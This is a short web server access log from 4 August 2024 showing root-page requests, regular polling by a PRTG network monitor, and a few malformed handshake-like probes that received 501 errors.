203.158.60.139 - - [04/Aug/2024:08:16:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [04/Aug/2024:08:17:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.247.172.129 - - [04/Aug/2024:08:17:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2)"
185.191.126.213 - - [04/Aug/2024:08:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Aug/2024:08:18:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:18:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
88.214.25.62 - - [04/Aug/2024:08:18:36 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [04/Aug/2024:08:19:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [04/Aug/2024:08:19:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [04/Aug/2024:08:20:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:20:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:21:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.233 - - [04/Aug/2024:08:21:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.233 - - [04/Aug/2024:08:21:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2024:08:22:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:23:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.199.37.210 - - [04/Aug/2024:08:23:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.2"
212.91.246.72 - - [04/Aug/2024:08:24:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [04/Aug/2024:08:24:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [04/Aug/2024:08:25:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2024:08:26:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
155.133.23.58 - - [04/Aug/2024:08:26:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.3"
212.91.246.72 - - [04/Aug/2024:08:27:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
